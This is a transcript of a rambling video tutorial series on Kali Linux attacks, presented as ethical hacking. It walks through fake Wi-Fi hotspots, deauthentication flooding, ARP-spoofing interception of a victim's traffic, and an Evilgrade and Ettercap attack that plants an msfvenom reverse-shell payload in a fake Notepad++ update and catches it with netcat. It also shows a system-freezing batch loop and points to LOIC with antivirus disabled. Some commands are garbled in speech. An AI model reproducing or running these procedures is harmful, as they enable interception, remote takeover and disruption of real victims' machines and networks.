and as you can see, VMware. But if I were using something different like that of my, let's see what I get if I go ahead and use, okay, for 132 host is up. This is for the VMware. Let's see if what happens if I go ahead and use my original computer's IP address. So, okay, sorry, it's IP config. Okay, I need to run it from user, I believe. As administrator and IP config. So let me check my, okay, I cannot see my, I forgot I cannot see my MAC ID over here. I need to go ahead and check that from my network's connection, I believe. Okay, so this is my MAC ID, FCAA14, and if I'll just go ahead and use it over here, FC1A414, let's see what I get. FCAA14. As you can see, I have the gigabyte technology, that is, so it's only with the first 6 digits it will go ahead and give me out the specific company's perfect attributes, so that I will be able to guess at least what exactly the person is using. Okay, so that is it for this tutorial. In the next tutorial, I'll be teaching you how we can go ahead and capture these packets and use them to go ahead and capture the data. Let's say, for example, the images and everything from the person's computer. That is it, guys, for this tutorial. And at the end of this tutorial, I'll be teaching you the evil grade, through which I can go ahead and insert my malicious tools inside the computer, inside the person's software updates, or I can even use them for redirecting persons to my own website and asking log in their own own credentials onto my fake website. So that's it, guys, for this tutorial. Hey guys, welcome to the next tutorial of ethical hacking and penetration testing via Kali Linux. So in this tutorial, we will be taking a look again, one of the same things, which is killing a network via Wi-Fi. I taught you previously how we can do that, but in this tutorial, the way I would be going ahead and teaching you would be to go ahead and DDoS a Wi-Fi that's distributed denial of service attack, or I'll just show you, for example, a denial of service attack non-distributor, because I would be requiring multiple Kali Linux operating systems for that to be running. So, and after that, I would be teaching you the Armon NG, Dump NG, and killing it out with access, without access, and finally snipping HTTP traffic through DriftNet. So, to start with Wi-Fi kill, I'll just go ahead and show you a simple process, but the only concern over here is that since I'm using this Kali Linux on VMware, I won't be able to go ahead and access my Wi-Fi because VMware does not detect, let's say, as you can see, it cannot go ahead and detect wireless networks. So I won't be able to use the Wi-Fi over here. But if you are using a dongle or something specific, VMware will be able to detect that, and then you can go ahead and use that separately. So I'll just be showing you simple commands as to how which we can go ahead and use to go ahead and kill the network. So the first thing that we need to do would be to go ahead and create multiple fake access points. So for doing that, we need to go ahead and type mdk3 space mon0, because mon0 would be our fake Wi-Fi spot. B space hyphen space C1 and hyphen N, and any name of the router. So I'll just type fake, let's say hotspot. Perfect. What this would be doing is that this would be creating fake hotspots everywhere, and you can name it anything that you want. So let's say, for example, if you want to go ahead and attack a computer, let's say, for example, you are at McDonald's and they are using the name of their McDonald's is McDonald's, for example, their hotspot. So you can just go ahead and type over here McDonald's, you can just type it over here, McDonald Wi-Fi, and after that, it will just create multiple fake hotspots of Wi-Fi, which will redirect their traffic to you. And if you want to just create some random hotspots, you can just type mdk3 mon0 space b, and it will create n number of fake hotspots. And to run to start fake access points where SSID is there in a text file, let's say, for example, if you have created a text file with multiple let's say hotspots, let's say, for example, just get text file with txt, open it down, just type a fake hotspot McDonald's, KFC, and make, let's say, chicken, any random names I'm taking. It's just not a matter of concern. So if you have n number of, let's say, names over here, then you can also go ahead and use these names to create hotspots. So all you need to just go ahead and type would be, just type your interface network, such as, let's say, for example, you can type MDK3 mon 0 space b space hyphen f, and you can type where the address as to where this is exactly. So this one would be on my desktop. I'll just type, let's say, desktop hyphen, and I'll type test.txt, and as soon as I hit enter, or there will be all of these fake hotspots created with these name over here. So that is just one example as to how we can go ahead and do that. And so here I'll just go ahead and show you something different right now. If you want to go ahead and capture the packets from a person's computer, you need to go ahead and start your fake interface. That would be the first thing. So in order for us to do that, let's first start our interface network. So that is, we need to go ahead and start our network. So I'll just type ifconfig. And I don't have Wi-Fi over here, as you can see, so I would be using my Ethernet 0, that's ETH0. And I have not yet tried this before on a wired network over LAN, so just let me check if I could do that, because I mostly tried this on a wireless network. So let's go ahead and run this mon0 and check airmon space ng start and ETH0. Okay, perfect. So it is running that means, so perfect. That means we have started the network. Now we need to run mon0, that is a fake or virtual LAN, to gather the MAC ID info about our target router. So for that, we need to type AIRODUMP -ng space mon0. And okay, I don't have wireless LAN, so I'll type ng. Okay. So as you can see, ARP link is set to 1, and this is the expected ARP HRD. But the reason for me not able to run this, because I don't have Wi-Fi. That's 802.11. But if you had a Wi-Fi, then you could surely be able to go ahead and run this. And just to target a TDO, just to go ahead and do a distributed denial of service attack, or a denial of service attack, just go ahead and type these things. And since this is not running on my system, because I don't have a Wi-Fi over here on my computer, but if you had a Wi-Fi, then it will run surely, and you will see that mon0 is up and running. And after that, only to go and DDoS your target, just need to type AIREPLAY airplay -ng and space -DEAUTH space 1000-A, and over here it would be your targets underscore MAC underscore ID. This would be your target MAC ID, and over here -H. And over here it would be your, I'll just go down and close this else. You don't need to type these arrows. I'm just typing so that it will be easier for you to understand. Over here it would be your attacker MAC ID, and then you just type mon0 and space ignore -1. Perfect. And as soon as you over here, it would be your target's MAC ID, target MAC ID, and it would be over your attacker MAC ID. This means your victim, target means the victim. And as soon as you go and type this, it will start sending n number of packets to your target's Wi-Fi, and the Wi-Fi. So what I'm doing in short over here is that I'm sending multiple packets to your Wi-Fi to go ahead and connect, but your Wi-Fi is unable to go ahead and capture all of these packets, and it will be confused, and finally it will be distorted, and it will have to reboot once again. It will not work until unless we have rebooted. In short, I'm doing a I'm doing a denial of service attack, and that's how it works. So this is one part. But if you already have access to your target's router after you have hacked into the Wi-Fi, you don't need to go ahead and type all these things. There are simple ways to go ahead and do that. So to check all the list of IP address connection, you can just type nmap-sp, as I taught you previously. You can just type this, and you will see which MAC ID you have, and we can go ahead and finally check your router's gateway by typing route-n and this specific slash grep, and you can just go ahead and type the upper arrow 0.0.0.0 and again the closed bracket and qt-d-f and 10. Okay, sorry, 10. Okay, so as you can see, this is my default router through which I'm going ahead and passing everything, and on which my Windows 7 is also there. Let's close this unnecessary resources. Perfect. So this is the method as to how we can go ahead and gather information. And once you have this specific thing, you can straight away go ahead and kill your router by using the previous method, that is ARP spoof hyphen E, that I slash, and this would be your network. Over here I'm using ETH0. If you have wireless LAN, then it will be WLAN 0 hyphen T to specify the target. This is your MAC ID, not sorry MAC ID, this is your gateway router, and this is the target. Just go ahead and type your these things and it will kill the router. Now we have seen these things, but there are something different, that is we can go ahead and sniff the HTTP traffic through DriftNet. Sniffing these HTTP traffics through DriftNet, it won't work on HTTPS because we will have to strip the SSL. So for the beginner part, I will only teach you the HTTP, that is it's if it's not secure. If it's only on HTTP and not HTTPS, then you will be able to gather all information, or at least the images that I will be teaching you today. So that's it for this tutorial. In the next tutorial, I'll be teaching you how we can go ahead and DDoS on network. No, sorry, not DDoS in network. I'll be teaching you how we can go ahead and gather information, and how we can go ahead and surpass the protective shield of our target's MAC ID. And then finally, we will be able to gather all the information that we need through DriftNet. Hey guys, welcome to the next tutorial of ethical hacking and penetration testing via Kali Linux. So in the previous tutorial, we saw how we can go ahead and DDoS a network, may it be wireless or may it be on our Ethernet. And we also taught you that even if you're not on a specific router, then also you can go ahead and do a distributed denial of service attack by using multiple computers, or simply denial of service attack. That would be more than fine to go ahead and stop, or let's say destroy the signals of a router. So, but in this tutorial, we would be teaching I would be teaching you something different. And that would be to sniff HTTP traffic through DriftNet. Over here, we would not be destroying anything. We would just be sniffing what the other party is actually doing. So, and make sure that it's only working. And I will make sure that this will only work on HTTP, because if it's HTTPS, then this will not work. And I will have to go ahead and strip off the secure system layer for our target computer. So let's start with this guy. So first thing that we would need to do would be to go ahead and first IP forward, that's port forward this thing. In order for us to do that, we need to go ahead and first type cat //PR. So what I'm simply doing is that I'm just port forwarding this thing. So cat /proc/sys. I'm just going into the directory /net/IPv4/IP_forward. Now hit enter. As you can see, this is 0 and cat means I am reading, but I need to change this 0 to 1 because I need to go ahead and forward my port so that I could go ahead and gain access, or change the person's ability to go ahead and access anything, so that I will be able to see what he's actually trying to access. So if this output is 0, you're getting the same thing, then just go ahead and edit it using your nano editor. Type nano and /proc/sys/net and IPv4 and IP_forward, and just go ahead and open this simple thing. And as it is 0, just go ahead and edit it, type 1, and as soon as you type 1, just go ahead and type Control X. It will ask you to save whether you want to save it. Type Y and enter, and just go ahead and hit enter. Perfect. Now again, go ahead and see whether it is changed. Perfect, it is changed to 1. Now, we need to go ahead and forward this port. So we need to go and type echo space 1 double arrows, and we need to type proc/sys/net/IPv4/IP_forward, and we need to go ahead and type this so that we will be able to go ahead and forward this IP. Done. Perfect. Now we need to spoof the victim PC to believe that we are the gateway. So in order for us to do that, we need to go ahead and type ARP spoof space -I space. Now here we need to go ahead and type the interface, that is ETH0 or WLAN0, whatever it is. So for me, you can go ahead and check it over here. You can type ifconfig and check where your IP address is. If you're using a wireless network, that is Wi-Fi, then you will see this IP address over your Wi-Fi. So I'll just go ahead and copy this and paste it over here, since not over here, sorry. First I need to type the ETH0 and -T. Now I need to go and type the victim's IP address and make sure that this is the victim's IP address. I'm not DDoSing a target, so I don't need to go and insert over here my gateway IP address. I need to write over here my victim's IP address. And if you already gained access to any computer, remote computer, then you would already have guessed the IP address of the victim. If not, then you can go ahead and type over here nmap-sp, and you can type 192.168.
Okay, and just before you have this, if you don't even have your routers, I have taught in the previous tutorial how we can go ahead and check the router's IP address. Okay, it should be 10. And this is my gateway. So I can just go ahead and type nmap hyphen sp space 192.168.236.2 to 154. And it will show me all the available IP ranges. And since 130 is my IP address, and sorry, 130, I believe. Yeah, 130 is my IP address. This is for the gateway. Then this means this would be for my target computer. I'll just copy it and paste it over here. That's the target -t. And then I will go ahead and now type my own gateway. And I will go ahead and this is my gateway. That's 192.168.2.236.2. Perfect. Now, as soon as I go ahead and type that, this above command will fool the victim PC to take us as the gateway. And now we need to forward all the packets to the victim's PC when he or she tries to access the web. And we do that by doing exactly the opposite. So I'll just go ahead and hit enter. And on this terminal, I will go ahead and type over here ARP spoof -I EDH0 space -t, and over here right now I need to go ahead and use the gateway IP address rather than using my or the target's IP address, because we are redirecting that person to us. So I'll just paste it over here, space, and now the victim's IP address. Sorry, this is the victim's IP address, and I'll hit enter. Perfect. Now everything is done, rerouting is done. Now just we need to start the different to access everything. So I'll just go ahead and start different over here. Okay, let me check. Okay, I think it should have been T, not I. Perfect. Okay, perfect. It's working. I'll start another terminal and I'll type driftnet, and let's see what we have over here. We have the simple space, but I need to go ahead and specify what actually we are trying to use. So I'll just go ahead and check whether my internet is still working. Yes, my internet is still working. And I won't be using the HTTPS. I'll be using the HTTP. I'll teach you later on as to how we can go ahead and okay, I believe I won't be able to use the HTTP because Google is always secure. So I'll just type driftnet space -I space, and now we need to type the internet. So it will be ETH0 in my case, and I'll hit enter. So this will go ahead and browse each and everything that we have, and that it will go ahead and show me everything that the person is accessing on the HTTP, not the S. So I'll just go ahead and let's say HTTP websites, and I'll just go ahead and check whether we have anything. Nothing till now. So let's check some websites which are not HTTPS. Okay. Just open this. Let's see if we have something. Okay, perfect. Since the Wikipedia is not based on HTTPS, as you can see, I have the Wikipedia images over here. Okay, it's a bit slow. Perfect. Now let's go ahead and check some random websites. We should be getting all the images over here which we are seeing. Okay, let's do one thing. Let's go to some actors website. Let's say Tom Cruise, for example, and this is the image. I don't know from where it is exactly. So I just want to see if I could get that image over here. If this is not on a secured web page, then I will be able to access that. Oh, it's HTTPS. Bad luck. So let's see this. Okay, let's see the IMDb website. Okay, perfect. As you can see, I have the IMDb website, and all the images over here will be displayed over here. I'll just go down, maximize this a bit, and I'll just refresh this. So it should be over here, each and everything, or maybe this is way too cached. So I'll just open another one. Let's say, for example, I'll go to the IMDb website, and I should be seeing this pic somewhere around here. Perfect. As you can see, we have this pic. So this gives me an idea as to what exactly the person is doing. So, and it's not that hard. So this is just for the HTTP. If you're using HTTPS website, then I can easily go ahead and strip off the secure layer, and I can also go ahead and access these things. But this is not it. If you go ahead and browse some more things, you can even go ahead and check which website the person is accessing. As you can see, I have all the images over here. As soon as this page loads in full, I will have everything over here filled. If you also have, you can also go ahead and use the Wireshark and sniff these traffics. Don't show this message again. Yeah, you need to go ahead and do that. And let this website load. Till then, we will go ahead and capture the traffic. I can just select 8080. Perfect. And I'll close. And I'll just start. So as you can see, whatever happens over here, I will get the exact area as to what exactly is happening, how much bandwidth is being consumed, and who is exactly using that. As you can see, 131 is our target, and it is, I will get all the information about what is accessing and when it is accessing. So you can go ahead and take a look at that. I won't be teaching you that in this tutorial, and I believe our page may have loaded in full, or maybe it may take forever to load. So that's it for this tutorial, guys. I have taught you almost everything. As you can see, the pages have been loaded until I closed. It was only loaded till over here. So I can see all the images, and different is only for going ahead and seeing the images. And yes, that's it for this tutorial. And we'll take another look of our evil grade in the next tutorial. Hey guys, welcome to the next tutorial of ethical hacking and penetration testing of Kali Linux. So all these tutorials that I have been teaching you, I have been telling you something that we can go ahead and inject our payloads or our malicious viruses through the updates, or I can go ahead and redirect people to my own websites by using the man-in-the-middle attack. So in this tutorial, I would be teaching you that practically as to how we can do that, and we would be using evil grade for this tutorial. And just before I proceed with evil grade, there's some people who would prefer to use Backtrack rather than Kali Linux, maybe because they're habituated or something. But Backtrack has already been discontinued if you don't know about that. And Backtrack was also good, but there were not a lot of tools in there. And as I will be teaching evil grade, you don't have evil grade in Backtrack. You need to specifically install that. So if you want to go and install that, you could go to the specific website and download evil grade. And you can download it from over here. You will be getting a TGZ file or something like that. And once you go ahead and download that, you can go ahead and use the tar space xf. If you go and download that over here, you can just type tar-xf and just type the name of the specific file that is for the evil grade, and it will extract. And after it's extracted, you can just type period slash and then the Perl file's name, and it will get installed. But over here in Kali Linux, the best part is that it is inbuilt. So I can just type evil grade and it will start. And as you can see, these are the loaded modules. Everything has been loaded. And so what is evil grade? That would be the first thing that would come in your mind. So evil grade is a modular framework that allows the user to take advantage of poor upgrade implementations by injecting fake updates. So it comes with pre-made binaries that are agents and a working default configuration for fast penetration testing. And it has the best part is that it has its own web server and DNS server modules. It's very easy to set up new settings. It has also auto configuration when new binary agents are set. So extract the evil grade if you're using Backtrack and run it by using commands such as tar space xf fz and whatever it may be in the file's name. If there is an error, then you need to go and check over the internet why it has some kind of error, because mostly probably people who are running Backtrack may come to an error, but I would not be teaching you that because I am teaching this for Kali Linux, and Kali Linux is far or n times better than Backtrack. Even if you have some problem with that, then you need to go ahead and check why I am saying that, because Kali Linux is far more sophisticated and upgraded than Backtrack. That's why. So coming back to our own tutorial. So just go ahead and start these things, and the next thing that I would be going is that I would be selecting something specific. So I'll see what different types of softwares are eligible so that we could go ahead and inject them. So I'll just type show show modules, and it will show all of these things, these applications which are you can say as they don't have good amount of security, and we can go ahead and inject our errors, our malicious files in between them. These are the files, so you need to know which file your target is using so that you could go ahead and let's say hijack that. So these are the Apple updates, that's a MacBook, and we have CCleaner. Most people use this app, or we have the let's say we have LinkedIn. People use this app. We have Nokia Software Notepad++ is one of the most famous one, and I would be using that today. We have OpenOffice. And we have QuickTime that normal people use, Skype, Speedbit, SunJava, TeamViewer, VirtualBox, VBox, VMware. So we have, and the best part is Windows Update. I won't be using Windows Update. I will be teaching you that at a later point of time. Today I would be using the Notepad++ application. So in this tutorial, we would be targeting user who use Notepad++. So when they are updating that application automatically, it will be caught in my trap. So to use modules, simply go ahead and run configure Notepad plus and just hit enter. And after that, to view the options, you can set up the use command show options, and in the image over here there's a virtual host. That means that when the victim update their Notepad plus, it will open a URL notepad that is plus.sourceforce.net. So we will later see how we can go and use this address, and Notepad plus plus is from the website sourceforce.net. So all the updates will be downloaded from over there, but we would be slightly going ahead and injecting our own payload and going ahead and let's say for example redirect their website from sourceforce.net to our malicious payload in between, and then redirect it to the source force so that updates will be installed along with our virus as well. So the next step is setting an agent. I will be configuring this agent to create a shell reverse TCP using MSF payload, but I believe MSF payload will be deprecated by now. So let me check, because the last time I used it was MSF payload. Yeah, MSF payload is deprecated and we will have to use the MSF Venom instead. I'll just close this and open a new one. So in order for us to do that, I will have to use the reverse shell TCP. So but before that, I'll just have to type set agent space apostrophe bracket and double apostrophe slash pentest slash exploit slash framework 3 slash MSF and Venom. I believe that's because I don't remember exactly. MSF Venom. Okay, just let me check where the folder is exactly. MSF Venom, and it would be MSF Venom Windows. I believe it's underscore. Okay, let me check. Okay, I believe that this pentest was for backtrack. Maybe it may have been changed. I believe it should be in OPD or something. Metasploit, and let me check. Let's just locate pen test. Okay, OPD Metasploit app, and let's locate MSF Venom. Okay, we have MSF Venom at OPD app MSF Venom. Perfect. MSF. Okay, I need to change these things. OPT slash. Okay, I'll just go down and close this and open it once more because I have already used that. So instead of me typing all of these things, to just use okay, perfect. Okay, I don't think these options would be available. So configure Notepad++, and I need to go ahead and set agent, and over here I need to type where exactly these things are. So it would be slash, and in the previous tutorials it was in the pentest directory in backtrack, but over here it would be in the OPD. So let's go ahead and check where our MSF Venom is exactly. So we have MSF Venom over here in multiple places, but the one which we would be using would be the OPD slash Metasploit app place. So I'll just copy it and paste it over here. MSF Venom space Windows slash shell underscore reverse underscore TCP, and you can just type the lhost name. Lhost equals to 192.168.236. Okay, reverse. Okay, I don't know what happened. Reverse underscore TCP lhost equals to 192.168.236.130. That is my IP address, and the L port, that is the localhost port, equals to 1234 x percentage OUT percentage slash, and now I have to type where it will go. So I'll just type temp slash notepadplus.exe, and then I'll need to go ahead and just type. So I need to go ahead and close this out.
percentage slash, and we check if I missed anything. Perfect. Okay, so once I have done this, I will now be able to go ahead and I've created this fake update virus file. And once we do this, we now need to go ahead and load the MSF payload or the MSF venom, whichever you have. We will use the Windows reverse shell TCP payload to open shell on the target when operation succeeded. And now we need to go ahead and make sure that the port 80 is empty, and we need to go ahead and redirect our person to our website, or not our website exactly, to our port, through which it would again go ahead and redirect itself after exploiting itself to the original SourceForge website. So that is it, guys, for this tutorial. In the next tutorial, I'll be teaching you how we can go. I will be continuing the same tutorial, and I'll be teaching you how we can go ahead and do that further. Hey guys, welcome to the next tutorial of ethical hacking and penetration testing via Kali Linux. So in the previous tutorial, I taught you how we could go ahead and create the fake MSF, fake update file of Notepad+ using MSF Venom. So in this tutorial, I'll be teaching you how we can go ahead and we will be using the Windows shell reverse TCP payload to open shell on the target when operation is succeeded. So just go and just to make sure that you know the OL host which I used previously was our local IP address, and L port is where we would be using, and make sure that your port 80 is empty because we would be using that. So after finishing setting up EvilGrade, you'll also need to configure the man-in-the-middle attack using ItterCap, and then redirect the connection to EvilGrade server when someone updating the Notepad+ application for the first time or any time, it doesn't matter. So the first step is you need to go ahead and configure your iter-period DNS file. So if you are using any previous versions, then the iter-period DNS file would be in the /user and /share /ittercap and iter period DNS. This would be the file, but over here it won't be. So I'll just go ahead and show you where exactly it is, because this is the new version. It would be in the user and share itercap, but it won't be over here. The reason being that the place has been changed. So the place exactly where it would be etc. Over here we have itercap, the place has been changed, and over here we have DNS. So just go ahead and open this file, and over here we need to change a few things. We need to go ahead and add a specific address where we could go ahead and redirect it to. So just go over here at the end. So we will be using itercap, and we would be going ahead and editing this. So I'll just go ahead and open my using the Pico, and I'll just go ahead and type /etc/itercap iter-period DNS. And over here, as you can see, I have my own host name and these addresses where I could go ahead and edit this. So, and just before we proceed, itercap is a suite for man-in-the-middle attacks on local area networks. It features sniffing of live connections, content filtering on the fly, and many other interesting tricks. It supports active and passive dissection of many protocols and includes many features for network and host analysis. You can download itercap if you don't have this from itercap.sourceforge.net. So to run itercap, open a new terminal, and I'll just go ahead and show you this later on as to how we are going to edit that. And just open the itercap. You can open the itercap from over here, and just go ahead and click on unified sniffing. After you have, just select the network interface. In my case, it would be ET/0, and select OK. And now we need to go ahead and change few things. Next step we would need to enable the DNS spoofing plugin, and this is used to go ahead and redirect the request from victim to our EvilGrade server. So just click on plugins and then click manage the plugins. Now go ahead and double click the DNS spoof plugin, this one, and this would be selected. After that, the next step is to scan host in our network. So we need to go ahead and click on host and scan for host. So 3 hosts were added. One would be mine, one would be the router, and one would be our active target. That would be our Windows 7 version. Perfect. So now once we have scanned this host, after listing all the hosts, we need to go ahead and set up the target. We also need to perform the man-in-the-middle attack to intercept all the data on the network. So click on the MITM and select ARP poisoning, and select sniff remote connections only, and don't select the one only poison one way, and select OK. So now after everything is set up, run the itercap over here from start and select start sniffing. The next step we will have to use the netcat to listen on the port 1234 that I have already defined when setting up the EvilGrade.
So Netcat is a featured network utility which reads and writes data across network connections using the TCP/IP protocol. It is designed to be a reliable backend tool that can be used directly or easily driven by other programs and scripts. At the same time, it is also a feature-rich network debugging and exploration tool since it can create almost any kind of connection you would need and has several built-in interesting capabilities. So open up the new terminal and just go ahead and run nc space hyphen this I don't know what it is called exactly, space v hyphen p and 1234. Okay, v not found. Let me check nc. Okay, verbose should be up and running until unless they have removed that as well. Let me just go ahead and remove that. Okay, it should be perfect. So it should be L, sorry, not the other button. So it has started listening on 1234, that is our port. So when the user opening Notepad++ application and the application is asking for the update application, automatically, like as I've shown you over here, they will have to answer the yes. And our Netcat terminal, we have something interesting because it's already on the victim shell. So what would happen over here is that as soon as the person goes ahead and clicks yes, okay, I want to update this application, it will be targeted to us over here, that is the Windows 7. My Netcat over here will go ahead and inject this our notepad.exe file over there, that is our payload file, and then it will be redirected towards the source forge. So if in case there are any other, let's say for example any updates, it will be updated along with our virus in that. So anytime as soon as we go ahead and receive the meter function over here, we need to go ahead and migrate that to a different, that is the explorer. If not, as soon as the notepad++ exits, even we will even our migrated non-migrated payload will exit. If it has not been exited, then our payload will run every time the person goes ahead and opens the notepad++ file. Okay, so that's how it works. You can also go ahead and do this for Windows updates as well. You just need to go ahead and, instead of using the sourceforge.net website, you can go ahead and use the Microsoft.net, and it will be much easier for you to go ahead and understand that. So that's it for this tutorial, guys, and in the next tutorial I'll be going around and teaching you about the denial of service attacks, and finally we will see how we can go ahead and DDoS a computer exactly. And if you're not knowing exactly how it works, I'll just go ahead and show you a simple example before I end this tutorial. I'll just open a simple script so that, okay, I don't want to hear about that, so I'll just show you a simple example as to how we can go ahead and do that, and after that I will be closing this tutorial. So I can just go ahead and type over here the one which I created. Okay, so just go ahead and type :A, or we're going to type start, and over here go to A, I believe, and I'll just go ahead and save this as a batch file. Test period BAT, and I'll save this, and I'll go ahead and execute that, and let's see what happens. Okay, let's the A was executed, and I believe the go to was not executed. Let me check. Okay, it should be go to A, not the go to A, and I'll just go ahead and run. Perfect. As you can see that I'm just simply going ahead and DDoSing this network. So no matter what I do, I just cannot just go ahead and close all of these things. Even if I press Alt F4, nothing will happen. Nothing happens over here, and the system is freezed. So this was just an extra option over here for you as to how we can go ahead and destroy someone's computer, and just don't go ahead and do it on your own PC, or you'll be going ahead and destroying loads of data. And I will need to go ahead and forcefully close this right now so that it does not hang my computer. And if you're having a big like 8 GB or 16 GB RAM, then probably it will take around 2 to 3 minutes for you to go ahead and hang your PC and later shut it down. But if you are just like around 1 or 2 GB system, then it will go ahead and quickly stop your system first, then destroy all the files, and then go ahead and shut down your computer. So that's it for this tutorial, guys. In the next tutorial, as I told you, I will be continuing with the distributed denial of service attacks, and finally we'll be seeing how we can go ahead and hack into Android system, and what actually Android is, since it is based on Linux, and how we can go ahead and use that up to our advantage using Kali Linux. So up till then, stay ahead with Kali Linux and have a nice day ahead. Hello guys, and welcome to the next tutorial of ethical hacking and penetration testing via Kali Linux.
So in the previous tutorials, we have taken a look of almost all of the things which you would need as a beginner. And in this tutorial, I'll be teaching you something which is called as a denial of service attack, or when done by multiple people from different networks, it is called as distributed denial of service attack, which is very and very harmful, and it cannot even be, you can say, prevented at most of the times. So in this tutorial, I will be teaching you denial of service attack, that is DOS, and distributed denial of service attacks. And you don't need to be an expert in anything to go ahead and do a denial of service attack, just a few basic things, and you can do that. So to start with, the first thing that I would ask you would be that what is DOS and what is DDoS? What are the effects of DDoS, levels of DDoS, preventing? How can we go ahead and prevent DDoS? But you might be wondering that I just told you that it cannot be prevented. So the thing is that it most likely cannot be prevented, at most of the times if there's an attack going on, then you cannot go ahead and stop it. But even before the attack starts, you can do something at least so that you could go ahead and prevent it from happening in the very beginning. And I'll show you why it is useful and why they are used in multinational companies. So what is DDoS exactly, or what is DOS exactly to start with? So it uses the fact that while a service can be more than sufficient to cater to the demands of the desired users, a drastic increase in unwelcome users can make the service go down. Most of us use the words like this website was down the other day, or without any idea of what it actually means. Well, now we will know today what exactly that means. To give you a good example of what is happening exactly, I'll take you to two different examples. And if you still want to know what exactly or how it works exactly, then you can go ahead and check on this specific the people. They are known as anonymous. So you can go ahead and search about them as to who exactly they are. And okay, so anonymous is a group which most people don't know of exactly who they are, because they mostly consist of random people, and they call themselves as hacktivists, and they normally go ahead and DDoS a lot of networks, and some of them have been caught, but you cannot go ahead and actually catch all of them, because they can be any one of us. It can be you, me, or anyone else. So anyone who wants to be anonymous can just go ahead, wear a mask, and help go ahead and doing an attack or anything. So they have done lots of other things. They have even done some kind of attacks on different countries as well, and still they are unable. People are unable to catch them. Even FBI is behind lots of them, but it's simply not possible to catch all of them. And they were the first to. They were not the first to go ahead and do this attack, but it's because of them that this attack became so famous that people came to know about the importance of a distributed denial of service attacks, because they almost do this in any kind of groups. That's why. So if you want further information, then you can go ahead and do that. Go ahead and research on them. But today I'll be giving you the basic concept of how exactly this works with two examples. First thing will be a multiplayer online game, and second thing would be a bus stop. So to start with, scenario one would be a multiplayer online game. So now just consider you are playing an online multiplayer game. There are millions of other people who also play this game. Now there's a pool in the game over here that everyone likes to visit. Now you and your friends know that they have the power of numbers. So there are a lot of you, and together you together you decide to make identical characters in the game. That means you make all of them look the similar. Then all of you go and block the access to the pool. You just carried out a denial of service attack. Yes, it's as simple as it is. The users of the game have now been deprived of a service which they had obtained the right to use when they signed up for the game. And this is just what the guys at 4chan, that is the birthplace and residence of Anonymous, they did a long time ago, this kind of games, and this is the basic kind of thing that gives you a very basic idea of what a denial of service attacks can be. So let's go ahead and take a look at scenario two. Yeah, this is not exactly what I was trying to, but I could not find any other good, let's say, a good image. So I took this image from out of nothing. So let's assume that this is a train stop. So now assume that due to some reason you want to disrupt the train service of your city and stop the people from using the service. To stop the legitimate people from utilizing the service, you can call your friends to unnecessarily use it. Basically, you can invite millions of friends to come and crowd around all the train stops and take the trains without any purpose. Practically, it is not feasible since you don't have millions of friends, and they are not definitely going to waste their time and money riding aimlessly from one place to another just for the sake that you want to go ahead and block people from using it. But this is how it works in the digital world. So while this may seem impossible in the real world, in the virtual world, you can cause as much load as 1,000 or even 1 million users alone at the click of a button. There are many tools out there for this purpose. However, you're not recommended to use them as a DOS or on someone else, as it is illegal and it is very easy to detect, since it also easily shows your IP address from where these packets are coming. So we will come back to this later on and do a DOS on our own computer. But as of now, I'll show you how this works exactly. And just before I go ahead and close this basic tutorial part, I'd like to show you the most famous tool which we use for attacking and hacking, and that is called as LOIC. And I'll just take you to the Wikipedia page as well. Let's open the Wikipedia page, not on the alternate page. Okay, perfect. Perfect. So as you can see, this LOIC is known as Low Orbit Ion Cannon. It is an open source network stress testing application for DOS attack. It's written in C sharp, and it was initially developed by these blah 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 and all these things. So it was mostly used by you can say as anonymous for going ahead and doing multiple attacks on people. And it's quite easy. I'll just go ahead and show it out to you. I'll just go ahead and download the binary zip file from over here. You can download these files. It's just like around 4 to 10 MB. I don't know exactly what's total. Okay, so I cannot go ahead and download that, I believe. My system is blocking me from downloading it. Never mind, since we won't be actually doing any kind of DOS attack on anyone else, I will only be using the Kali Linux to going ahead and doing the attack on my own system. I won't be needing that, since LOIC is mostly used when you want to go ahead and do a DOS attack on anyone else's website or something. So we won't be doing a DOS attack on a website. We will only be doing that on a computer. So let's go ahead and start. Let me show you how it looks like in exactly our images. So, okay, so this is how the LOIC software looks like. So as soon as you download it from the SourceForge website, just double click it, it will start running, and make sure that your antivirus is disabled, because it will most probably detect itself as malware. And you also have a LOIC application for in Google Play Store. Let me check whether they may have deleted that. Let me check. Okay, here it is. Okay, I believe that Google Play Store has removed this from their page. The reason being that it may be used as for malicious purposes, but you can still find these applications out there. As you can see, we have over here LOIC 5.0, and that is the latest one, I believe. And yes, that's the latest one, since I have the same in my cell phone. So you can download it all from here. So when you go and if you go and use your, if you must be having a good cell phone, because you cannot do it from a cell phone which has like 512 MB RAM or 256 MB RAM. You need a good cell phone of minimum 1 GB RAM to go ahead and do that, else your own cell phone will be hanged. That's why. So it looks like this. You can go and enter the URL or the IP address of whichever computer or website you want to go ahead and start. Just click lock on, and the target will be selected. And just go ahead and select over here. It will be start flooding. And as soon as you can click start flooding, it will show stop flooding option, and you can go ahead and select the speed as well, as to which you want to go ahead and actually attack. And you can go ahead and use the port, which port the person is actually using for its website, and the methods and threads depending upon the speed of your computer and everything. It will go ahead and shut down the computer or the website. So these things were used, and yep, that's it for this tutorial, guys. And in the next tutorial, I'll be teaching you as to why I was going ahead and teaching you all of these things. And there are multiple ways of doing DDoS attack, and you most probably will not be able to save yourself from everything, but I can surely go ahead and teach you as to how we can go ahead and save ourselves from this kind of attack. And in the next tutorial, I'll be describing in detail as to what exactly happens in between the DDoS attack in practical, and how it looks like exactly. Hey guys, welcome to the next tutorial of ethical hacking and penetration testing via Kali Linux. So in the previous tutorial, we saw how exactly DDoS looks like and what is the basic concept behind that. So how you might be wondering how DDoS attacks are actually carried out. Basically, when you visit a website, you send them a request to deliver their content to you. When you send, what you send is actually a packet. Basically, it takes more than just one packet. You need a lot of them. but still the bandwidth that you consume in requesting the server to send you some data is very little. In return, the data they send you is huge. This takes up server resources for which they pay for, and a legitimate view can easily earn more than the server cost on account of advertisement, etc. So companies buy server that can provide enough data transfer for its regular users. However, if the number of users suddenly increases, the server gives up. It goes down, and since the company knows it is under DDoS attack or DOS attack, it just turns off the server so that it does not have to waste its monetary resources on a DOS and wait till a DOS stops. Now, the modern computers and bandwidth, we alone can easily pretend to be 1,000 or even more users at once. While this is not good for the server, it is not something that you can make it happen. Your computer is not the only thing that gets better with time. The servers do too. However, if a lot of people like us go ahead and like me or you go ahead and do a DOS attack, it becomes a distributed DOS attack, that is distributed denial of service attack, or DDoS. This can easily be fatal for a server, and it's just like you go to a page and start refreshing it very fast, maybe 1,000 times every second. Yeah, it may be what you can say as a hyperbole, that 1,000 times a second, but yes, that's exactly how DDoS works. And you're not the only one doing that. There are thousands others 